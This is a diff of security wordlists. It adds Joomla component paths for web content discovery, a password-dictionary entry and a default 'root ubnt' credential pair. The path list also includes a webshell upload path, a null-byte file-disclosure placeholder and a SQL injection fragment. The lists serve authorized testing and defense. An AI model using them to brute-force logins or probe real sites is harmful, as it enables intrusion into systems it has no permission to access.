+components/com_redshop/
+components/com_redtwitter/
 components/com_referenzen/
+components/com_registration/
+components/com_registrationpro/
 components/com_rekry/
+components/com_remository/
 components/com_remository/admin.remository.php
 components/com_remository_files/file_image_14/1276100016shell.php
+components/com_reporter/
 components/com_reporter/processor/reporter.sql.php
+components/com_reservations/
 components/com_resman/
 components/com_restaurante/
+components/com_restaurantguide/
 components/com_ricette/
+components/com_rokcandy/
+components/com_rokdownloads/
+components/com_rokmodule/
+components/com_roommgmt/
+components/com_route/
+components/com_rpl/
+components/com_rpx/
+components/com_rsappt_pro2/
+components/com_rsappt_pro3/
+components/com_rsbook_15/
+components/com_rscomments/
 components/com_rsfiles/
+components/com_rsform/
 components/com_rsgallery/
 components/com_rsgallery2/
+components/com_rsmonials/
 components/com_rss/
 components/com_rssreader/
 components/com_rssxt/
 components/com_rwcards/
+components/com_s5_media_player/
+components/com_s5clanroster/
+components/com_salesrep/
+components/com_sanpham/
+components/com_sar_news/
+components/com_saxumastro/
+components/com_saxumnumerology/
+components/com_saxumpicker/
+components/com_sbsfile/
+components/com_scheduling/
 components/com_school/
+components/com_schools/
+components/com_science/
 components/com_search/
+components/com_searchlog/
+components/com_sebercart/
 components/com_sebercart/getPic.php?p=[LFD]%00
+components/com_sectionex/
 components/com_securityimages/
+components/com_seek/
 components/com_sef/
 components/com_seminar/
+components/com_serie/
+components/com_sermon/
+components/com_sermonspeaker/
+components/com_serverstat/
 components/com_serverstat/install.serverstat.php
+components/com_sexypolling/
+components/com_seyret/
 components/com_sg/
+components/com_sgicatalog/
+components/com_shop/
+components/com_shoutbox/
+components/com_showdown/
+components/com_siirler/
+components/com_simgenealogy/
+components/com_simple/
 components/com_simple_review/
 components/com_simpleboard/
+components/com_simplecalendar/
+components/com_simpledownload/
 components/com_simplefaq/
+components/com_simpleimageupload/
+components/com_simplemembership/
+components/com_simplephotogallery/
 components/com_simpleshop/
+components/com_simpleswfupload/
+components/com_sitemap/
 components/com_sitemap/sitemap.xml.php
+components/com_slider/
 components/com_slideshow/
+components/com_smartseller/
+components/com_smartshoutbox/
+components/com_smartsite/
+components/com_smestorage/
 components/com_smf/
 components/com_smf/smf.php
+components/com_smslist/
+components/com_sobi2/
+components/com_soccerbet/
+components/com_socialads/
+components/com_socialpinboard/
+components/com_software/
+components/com_solidres/
+components/com_solution/
+components/com_some/
+components/com_soundset/
+components/com_spa/
+components/com_spain/
+components/com_spec/
+components/com_spidercalendar/
+components/com_spidercatalog/
+components/com_spiderfacebook/
+components/com_spiderfaq/
+components/com_spielothek/
+components/com_spmoviedb/
+components/com_sponsorwall/
+components/com_sportfusion/
+components/com_sportspredictions/
+components/com_spsnewsletter/
+components/com_sqlreport/
+components/com_squadmanagement/
+components/com_staffmaster/
+components/com_start/
+components/com_staticxt/
+components/com_store/
+components/com_storedirectory/
+components/com_streetguess/
+components/com_surveyforce/
+components/com_surveymanager/
+components/com_svmap/
+components/com_sweetykeeper/
+components/com_swmenufree4/
 components/com_swmenupro/
+components/com_szallasok/
+components/com_tag/
+components/com_tariff/
+components/com_tax/
+components/com_teacher/
 components/com_team/
+components/com_teamdisplay/
+components/com_teams/
+components/com_tech/
 components/com_tech_article/
+components/com_techfolio/
+components/com_television/
 components/com_thopper/
+components/com_threate/
 components/com_thyme/
+components/com_ticketbook/
 components/com_tickets/
+components/com_tienda/
+components/com_timereturns/
+components/com_timetable/
+components/com_timetrack/
 components/com_tophotelmodule/
+components/com_topics/
+components/com_topmenu/
+components/com_tour/
 components/com_tour_toto/
+components/com_tpdugg/
+components/com_tpjobs/
+components/com_trabalhe_conosco/
 components/com_trade/
+components/com_trading/
+components/com_travelbook/
+components/com_tree/
+components/com_treeg/
+components/com_tsonymf/
+components/com_ttvideo/
+components/com_tupinambis/
+components/com_turtushout/
+components/com_tweetla/
+components/com_twitchtv/
 components/com_uhp/
 components/com_uhp2/
+components/com_ultimateportfolio/
+components/com_uniterevolution2/
+components/com_units/
+components/com_universal/
+components/com_upl/
+components/com_user/
 components/com_user/controller.php
+components/com_userbench/
+components/com_userextranet/
 components/com_users/
+components/com_userstatus/
+components/com_utchat/
 components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
 components/com_vehiclemanager/
 components/com_versioning /
+components/com_versioning/
+components/com_videodb/
 components/com_videodb/core/videodb.class.xml.php
+components/com_videoflow/
+components/com_videogallery/
+components/com_videogallerylite/
+components/com_videos/
+components/com_videowhisper_2wvc/
+components/com_vikappointments/
+components/com_vikbooking/
+components/com_vikrealestate/
+components/com_vikrentcar/
+components/com_vikrentitems/
+components/com_virtualmoney/
 components/com_virtuemart/
+components/com_visa/
+components/com_visualcalendar/
+components/com_vjdeo/
+components/com_vmap/
+components/com_voj/
 components/com_volunteer/
 components/com_vr/
+components/com_vxdate/
+components/com_wallpapers/
 components/com_waticketsystem/
+components/com_wddownload/
+components/com_wdsubscriptions/
+components/com_webeecomment/
+components/com_weberpcustomer/
 components/com_webhosting/
 components/com_weblinks/
 components/com_webring/
+components/com_webtv/
+components/com_wgpicasa/
+components/com_wines/
+components/com_wire_immogest/
+components/com_wisroyq/
+components/com_wmi/
+components/com_wmt_content_timeline/
 components/com_wmtgallery/
+components/com_wmtpic/
 components/com_wmtportfolio/
+components/com_wmtrssreader/
+components/com_worldrates/
+components/com_wrapper/
 components/com_x-shop/
+components/com_xball/
+components/com_xcloner-backupandrestore/
+components/com_xcomp/
+components/com_xeslidegalfx/
 components/com_xevidmegahd/
 components/com_xewebtv/
 components/com_xfaq/
+components/com_xgallery/
 components/com_xgallery/helpers/img.php?file=
+components/com_xmap/
+components/com_xmovie/
+components/com_xobbix/
 components/com_xsstream-dm/
+components/com_xvs/
+components/com_yanc/
+components/com_ybggal/
+components/com_yellowpages/
+components/com_yelp/
+components/com_yjcontactus/
 components/com_ynews/
+components/com_youtube/
+components/com_youtubegallery/
 components/com_yvcomment/
+components/com_zcalendar/
+components/com_zelig/
+components/com_zhbaidumap/
+components/com_zhgooglemap/
+components/com_zhyandexmap/
+components/com_zimbcomment/
+components/com_zimbcore/
+components/com_zina/
+components/com_zoom/
 components/com_zoom/classes/
+components/com_zoomportfolio/
+components/com_ztautolink/
+components/icom_nvitex/
 components/mod_letterman/
 components/remository/
 eXtplorer/
 easyblog/entry/uncategorized
 extplorer/
-components/com_mtree/img/listings/o/{id}.php where {id}
 includes/joomla.php
 index.php/404'
 index.php/?option=com_question&catID=21' and+1=0 union all
@@ -86241,6 +86241,7 @@ wharves
 what
 whatchamacallit
 whatever
+whatevers2009
 whatley
 whatnot
 whatshername
@@ -405,6 +405,7 @@ root realtek
 root root
 root tini
 root tslinux
+root ubnt
 root user
 root vizxv
 root wyse
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .5.1
 .6.2